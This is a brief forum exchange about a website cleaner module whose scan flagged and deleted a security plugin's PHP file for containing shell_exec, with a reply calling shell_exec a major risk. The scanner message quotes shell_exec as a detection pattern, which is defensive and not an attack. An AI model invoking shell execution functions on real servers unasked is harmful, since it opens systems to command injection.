Got one question: the cleaner is good, but I have one problem. When I run the scan on bigger files it detects "Fichier dangereux supprimé (shell_exec) => web/modules/securitypro/securitypro.php Voir" and deleted it. But this is the security plugin, which of course has a lot of rights; this shouldn't be deleted. How can I prevent it from doing this?

Peter_S83 Posted September 11

And another question: what does it scan? As I see, it creates a folder private/bak and there is my whole site. Why, and what is it changing?

Eolia Posted September 11

shell_exec is a very big risk in a PHP script; besides, many hosts block this function.

Cleaner doesn't create any folder, only zip files with detected files.

If you are happy with your security pro, why use cleaner?